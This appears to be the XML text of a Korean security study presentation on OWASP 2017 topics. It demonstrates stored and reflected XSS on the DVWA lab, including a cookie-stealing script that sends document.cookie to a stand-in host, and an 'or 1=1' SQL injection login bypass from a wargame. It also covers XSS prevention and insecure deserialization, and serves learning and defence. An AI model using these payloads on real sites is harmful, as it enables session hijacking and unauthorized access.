            <a:ext cx="7153275" cy="2482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E9998D-6897-412E-B1E6-74579148F87F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589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칼리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host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log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값이 기록되게 됨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-reflected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9D3682-D5E1-4FF9-9D38-C0A1A30DD4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9149" y="2258877"/>
            <a:ext cx="5033971" cy="3211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5F84B-6080-466D-BE59-B8D2F91FD5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13120" y="2257484"/>
            <a:ext cx="5731510" cy="3212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AE337-6BC9-4BA2-95A8-EACEA208E0AC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3908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DVWA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사이트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-&gt; XSS (Stored)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클릭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A6065-66DA-4974-A762-18473EFE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20" y="2448400"/>
            <a:ext cx="6667183" cy="2875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85EEE9-B17A-425D-B37C-EBDBE347505C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96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reflected xss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에서 사용한 쿠키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탈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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취와 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같은 스크립트를 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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방명록 형태의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form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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Message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR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부분에 삽입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A6065-66DA-4974-A762-18473EFE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20" y="2448400"/>
            <a:ext cx="6667183" cy="2875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458A2-29CA-41AE-8446-5F62225196E6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148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‘</a:t>
            </a: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&lt;script&gt;document.location=‘http://127.0.0.1/cookie?’</a:t>
            </a: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+document.cookie&lt;/script&gt;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D30E13-08A7-404D-B12B-4B250216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4" y="2713141"/>
            <a:ext cx="5705648" cy="22382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C9D1A-BA51-4FC3-8998-AC850950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706" y="1922393"/>
            <a:ext cx="4629150" cy="302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DFA6A-F5A9-4555-AB90-9F66B9EF4B12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886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Maxlength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500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으로 수정해준다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1BB2EF-BD6F-4B8B-9A76-AED8335F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07" y="2347912"/>
            <a:ext cx="6850985" cy="3049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CFD527-98A5-4CFA-9545-A2FFFC368A7F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340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다시 스크립트 코드를 복사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-&gt;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붙여넣기 후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sign guestbook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클릭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C510CB-122A-439C-9FDD-B7C19BC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90" y="2713795"/>
            <a:ext cx="8912935" cy="234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03C3C5-6F58-462B-9931-293EC0804753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483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‘</a:t>
            </a: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다음과 같이 에러 페이지 발생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476F7F-4BDA-4A22-BC71-10D94DF9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56" y="1962149"/>
            <a:ext cx="748665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EB926-6485-48F4-B126-472326E0AF3D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61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5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해커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host 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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="28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들어가보니 다음과 같이 쿠키 값이 남아있음</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="28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9ED0-23CB-4A69-989C-CCF119AC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55" y="2695574"/>
            <a:ext cx="8782050" cy="238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E22B62-AAA0-4501-80B7-4C7D5C4B7110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95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뒤로가기로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DVWA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사이트 들어갔다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-&gt; xss (stored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들어가기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</a:p>
          <a:p>
            <a:pPr algn="ctr"/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들어가기만 해도 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log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값이 남아있음을 확인할 수 있음</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400">
              <a:solidFill>
                <a:srgbClr val="C00000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-Stored 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0A3309-B4F0-4E5D-B78C-31AD8E41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1" y="2543305"/>
            <a:ext cx="4594058" cy="26857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440AF0-A35D-47F2-968D-24B49E1FEC26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5370123" y="3904485"/>
            <a:ext cx="725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C2B806C-3956-4FDD-89F1-EA10E995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05" y="2543305"/>
            <a:ext cx="5188039" cy="268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581FF3-70AE-4B8F-B6E3-A3B5DBCC4474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46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B44D45-A713-4DBE-8274-9268FC9C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DDD743-2B1B-4C7B-96E5-DC362F6D6875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18A45-52BF-4AE7-8958-58504652053A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8806542" y="6139543"/>
            <a:ext cx="299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4"/>
              </a:rPr>
              <a:t>https://los.eagle-jump.org/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EC863-9964-4747-AF50-41C395936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0" y="1790164"/>
            <a:ext cx="7506748" cy="2876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876CB-486C-4543-B5F3-0C0AB712FE85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="854528" y="4630153"/>
            <a:ext cx="7434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&lt;LOS(load of SQL Injection) 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="16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번문제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="16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FDA387-D4D0-4564-BED8-1A10489EC14E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7900188" y="1810175"/>
            <a:ext cx="2024743" cy="369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?id='or 1=1 %23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1B92F5-CB5E-432F-956B-935F0B690C84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="873708" y="5066899"/>
            <a:ext cx="7750629" cy="10726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select id from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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prob_gremlin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 where id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx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='</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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84638-1367-4EF6-850B-7C296A740944}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2147733" y="5702305"/>
            <a:ext cx="538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' and pw='{$_GET[pw]}'</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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9BCAE-6D18-4988-A45F-AF5687C5E605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6403850" y="54007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‘or 1=1 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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8DB1F-EB0D-417D-87A5-EAA2311C8791}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331756" y="434459"/>
            <a:ext cx="424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Injection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D2E61-C739-4F1A-BC91-B8802B318F66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CHAPTER 02.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B7265-4B47-4023-B02F-50F038978EAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="505097" y="1402080"/>
            <a:ext cx="40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URL Injection </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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24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근본적인 제거를 위해선 스크립트 등 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해킹에 사용될 수 있는 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입력 및 출력 값에 대해서 검증하고 무효화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시켜야 한다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*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데이터 입력 전에 입력 데이터의 길이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문자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형식 및 사업적 규칙 유효성을 검사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예방안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5E4B3-7885-4D33-9905-25E8C7936E96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3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출력 값 무효화 위해 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&lt;script&gt; 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태그의 공격을 차단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해야하므로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태그 문자와 같이 문자 참조로 필터링을 하고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서버에서 브라우저로 전송 시 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문자를 인코딩 한다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en-US" altLang="ko-KR" sz="2400">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight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예방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C990C-DCB0-4B52-BB5B-25B91E58BC9F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6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 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문자 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"&lt;"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는 동일한 의미의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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HTML "&amp;lt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C0000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변경한다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대부분의 인터프리터에서 특수한 의미를 가지지 않고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단순한 의미로 처리됨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따라서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브라우저에서는 일반 문자로 인식하고 스크립트로 해석되어 실행되지 않는다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예방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AA871-2369-42C7-863C-5F137D858605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074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 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en-US" altLang="ko-KR" sz="2000">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.kisa.or.kr/uploadfile/201312/201312161355109566.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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605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크로스 사이트 스크립팅</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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(XSS)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24BB5-A616-402F-9E31-AE9E40FE75AF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-XSS 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공격 예방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4BB0B-4EB8-4A2E-98BF-4C7F58BB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52" y="2448990"/>
            <a:ext cx="9367495" cy="3170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859B4-BD87-40D0-9601-936830E94166}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331756" y="215443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A7:2017.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433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7937C4-CBE5-4675-B384-268F98AA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53CA9-2E34-4558-B70B-F9D4F295E00F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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A8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"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en-US" altLang="ko-KR" sz="28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6385C-CE9C-4057-B3BC-92211944AA83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116114" y="116114"/>
            <a:ext cx="438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모두의 보안 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이이백염</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="160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819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38A4C-C70C-4021-935B-7F3222A61DB4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80A2B2-B068-4934-AAA7-0EE98AD8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5" y="2257484"/>
            <a:ext cx="10596910" cy="32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41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직렬화라는 말은 말 그래도 직렬로 만들겠다는 것이다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사실 </a:t>
            </a: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직렬화라는 단어에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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객체</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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의 내용이 포함되지 않는다면 의미가 없는데</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight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객체를 어떤 장치에 쓰고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다시 객체로 복원하는지에 대한 작업이 직렬화와 역직렬화에 관련된 작업이 된다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FE778-9153-4F2B-ACFF-C5062A0A0E06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359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만약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우리가 만든 객체가 있다고 해보자 이 객체를 똑같이 복원하고 싶을 때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어떻게 해야 할까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객체는 어플리케이션에 만들어지는데 만약 프로그램이 죽는 순간 다 날라가 버리는 상황을 보자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="20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B1579-4025-4212-8D76-A39725392829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619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어플리케이션을 다시 켰을 때 지금까지 만들어 놓은 객체를 복원되게 하고 싶다면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이러한 요구로 부터 나온 단어가 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따라서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객체지향적인 부분이 아니라면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직렬화라는 개념이 나오지 않는다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599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7928D-6872-4E22-84F0-598A0FA98159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0665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83CD45-0A77-4FD3-A682-FBAAB674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6D108-2170-4512-BFF5-57676EC37CD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331756" y="1238250"/>
            <a:ext cx="11528488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직렬화는 어떠한 객체의 상태를 저장하기 위해서 포멧이란 틀을 사용하는데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이때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자동화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라는 개념이 들어가게 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직접 포멧을 만들고 저장하고 복원을 하지 않아도 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400">
              <a:solidFill>
                <a:schemeClr val="tx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객체의 인스턴스를 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byte code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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로 저장하는 작업을 직렬화 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight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저장된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byte code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부터 객체를 불러오는 작업을 역직렬화 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(deserialization)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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이라고 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx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9A56-C688-4E65-BCD3-DC08D7948B54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331756" y="434459"/>
            <a:ext cx="576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안전하지 않은 역직렬화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0E5A7-8193-49B0-AA3E-DAE394CE03ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616254" y="1460728"/>
            <a:ext cx="878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(Serialization)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:latin typeface="a고딕10" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="a고딕10" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>와 역직렬화</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="a고딕10" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="a고딕10" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(Unserialization)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="240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D7BDF-B044-4281-AD82-690FFA1AC169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331756" y="215443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A8:2017.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5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4240</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>1108</Paragraphs>
  <Slides>107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23" baseType="lpstr">
      <vt:lpstr>a고딕10</vt:lpstr>
      <vt:lpstr>a고딕11</vt:lpstr>
      <vt:lpstr>a고딕12</vt:lpstr>
      <vt:lpstr>a고딕14</vt:lpstr>
      <vt:lpstr>a고딕15</vt:lpstr>
      <vt:lpstr>a고딕17</vt:lpstr>
      <vt:lpstr>a타임머신</vt:lpstr>
      <vt:lpstr>경기천년제목 Bold</vt:lpstr>
      <vt:lpstr>경기천년제목 Light</vt:lpstr>
      <vt:lpstr>경기천년제목OTF Bold</vt:lpstr>
      <vt:lpstr>경기천년제목OTF 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Windows10</dc:creator>
  <cp:lastModifiedBy>이 혜민</cp:lastModifiedBy>
  <cp:revision>76</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-02T14:36:08Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-07T05:41:56Z</dcterms:modified>
</cp:coreProperties>
</file>